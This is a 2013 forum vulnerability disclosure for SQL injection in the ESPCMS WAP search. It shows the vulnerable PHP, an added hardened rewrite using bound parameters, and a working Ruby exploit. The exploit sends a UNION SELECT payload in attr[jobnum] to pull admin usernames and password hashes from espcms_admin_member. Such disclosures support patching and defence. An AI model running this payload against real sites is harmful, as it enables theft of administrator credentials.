China Network Penetration Testing Alliance
Title: espcms wap module search SQL injection
Author: admin
Time: 2013-7-27 18:31
0x0 Vulnerability overview
0x1 Vulnerability details
0x2 PoC
0x0 Vulnerability overview

Yisi ESPCMS is an enterprise website management system built on the LAMP stack. It is simple to operate, feature-rich, stable, extensible and secure, and easy to customise and maintain, so it helps you build a powerful, professional corporate website quickly and easily.

Its handling of incoming parameters is not rigorous, which leads to SQL injection.
0x1 Vulnerability details

The variable flows $_SERVER['QUERY_STRING'] -> $urlcode -> $output -> $value -> $db_where -> $sql -> mysql_query, and nothing along that path filters it, which is what makes the injection possible.

Precisely because the variable is read from $_SERVER['QUERY_STRING'], it bypasses the program's own input filtering.

And the injected variable is an array value, not an array key, so it is not filtered either. Together these form a fairly uncommon SQL injection.

In the in_result function of /interface/3gwap_search.php:
    function in_result() {
        ... ... ... ... ... ... ... ... ...
        // Raw query string, read directly from the server array: the
        // application's normal request filtering never sees it.
        $urlcode = $_SERVER['QUERY_STRING'];
        parse_str(html_entity_decode($urlcode), $output);
        ... ... ... ... ... ... ... ... ...
        if (is_array($output['attr']) && count($output['attr']) > 0) {
            $db_table = db_prefix . 'model_att';
            foreach ($output['attr'] as $key => $value) {
                if ($value) {
                    // Only the array key is escaped and trimmed ...
                    $key = addslashes($key);
                    $key = $this->fun->inputcodetrim($key);
                    $db_att_where = " WHERE isclass=1 AND attrname='$key'";
                    $countnum = $this->db_numrows($db_table, $db_att_where);
                    if ($countnum > 0) {
                        // ... while the array value is concatenated into the
                        // WHERE clause untouched.
                        $db_where .= ' AND b.' . $key . '=\'' . $value . '\'';
                    }
                }
            }
        }
        if (!empty($keyword) && empty($keyname)) {
            $keyname = 'title';
            $db_where .= " AND a.title like '%$keyword%'";
        } elseif (!empty($keyword) && !empty($keyname)) {
            $db_where .= " AND $keyname like '%$keyword%'";
        }
        $pagemax = 15;
        $pagesylte = 1;
        if ($countnum > 0) {
            $numpage = ceil($countnum / $pagemax);
        } else {
            $numpage = 1;
        }
        // $db_where reaches the final statement without further checks.
        $sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;
        $this->htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON['file_fileex'], 5, $this->lng['pagebotton'], $this->lng['gopageurl'], 0);
        $sql = $this->htmlpage->PageSQL('a.did', 'down');
        $rs = $this->db->query($sql);
        ... ... ... ... ... ... ... ... ...
    }
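For comparison, the following is an added example (written for this post, not ESPCMS code) showing how the attr[] and keyword/keyname handling above would look with the column names validated before they reach SQL and every user-supplied value bound as a parameter. It assumes a PDO handle, a db_prefix of 'espcms_', a $db_where that begins with ' WHERE 1=1', and a constructed list of searchable columns; none of these come from the post.

```php
<?php
// Added example, not ESPCMS code: hardened rewrite of the attr[] and
// keyword/keyname handling from in_result(). Column names are validated
// before they reach SQL; every user-supplied value is a bound parameter.
// Assumed (not from the post): PDO handle, db_prefix = 'espcms_', WHERE 1=1.
const db_prefix = 'espcms_';
// Returns [$where_fragment, $bound_params] for the attr[] part of the query.
function attr_where(PDO $pdo, array $output): array
{
    $where = ''; $params = [];
    if (empty($output['attr']) || !is_array($output['attr'])) {
        return [$where, $params];
    }
    $check = $pdo->prepare('SELECT COUNT(*) FROM ' . db_prefix
        . 'model_att WHERE isclass=1 AND attrname=?');
    foreach ($output['attr'] as $key => $value) {
        // A column name must be a plain identifier; anything else is dropped.
        if (!is_scalar($value) || (string)$value === ''
            || !preg_match('/^[A-Za-z0-9_]{1,64}$/', (string)$key)) {
            continue;
        }
        $check->execute([(string)$key]);
        if ((int)$check->fetchColumn() === 0) {
            continue;                           // not a known attribute
        }
        $where   .= ' AND b.`' . $key . '`=?';   // verified identifier
        $params[] = (string)$value;             // value never enters the SQL text
    }
    return [$where, $params];
}
function wap_search(PDO $pdo, string $query_string, int $pagemax = 15): array
{
    // $query_string is the raw $_SERVER['QUERY_STRING'], as in the original.
    parse_str(html_entity_decode($query_string), $output);
    [$where, $params] = attr_where($pdo, $output);
    $keyword = (string)($output['keyword'] ?? '');
    // keyname may only pick a column from a fixed list (constructed here).
    $columns = ['title' => 'a.title'];
    $column  = $columns[(string)($output['keyname'] ?? 'title')] ?? 'a.title';
    if ($keyword !== '') {
        $where   .= " AND $column LIKE ?";
        $params[] = '%' . $keyword . '%';
    }
    $sql = 'SELECT b.*,a.* FROM ' . db_prefix . 'document AS a LEFT JOIN '
        . db_prefix . 'document_attr AS b ON a.did=b.did WHERE 1=1'
        . $where . ' LIMIT 0,' . $pagemax;
    $stmt = $pdo->prepare($sql);
    $stmt->execute($params);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}
```

Because the attribute name is checked against model_att with a prepared statement and then restricted to a plain identifier, and the value is bound rather than concatenated, a query string such as the PoC below only produces an empty result set.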
0x2 PoC
    require "net/http"

    # Minimal GET helper used by the PoC.
    def request(method, url)
      if method.eql?("get")
        uri = URI.parse(url)
        http = Net::HTTP.new(uri.host, uri.port)
        response = http.request(Net::HTTP::Get.new(uri.request_uri))
        return response
      end
    end

    doc =<<HERE
    -------------------------------------------------------
    Espcms Injection Exploit
    Author:ztz
    Blog: http://ztz.fuzzexp.org/
    -------------------------------------------------------
    HERE

    usage =<<HERE
    Usage: ruby #{$0} host port path
    example: ruby #{$0} www.target.com 80 /
    HERE

    puts doc
    if ARGV.length < 3
      puts usage
    else
      $host = ARGV[0]
      $port = ARGV[1]
      $path = ARGV[2]
      puts "\nsend request..."
      # The payload travels in the attr[] array value, which is the unfiltered
      # parameter described in section 0x1.
      url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
      response = request("get", url)
      # CHAR(38) is '&', so the result renders as username&<32-char hash>.
      result = response.body.scan(/\w+&\w{32}/)
      puts result
    end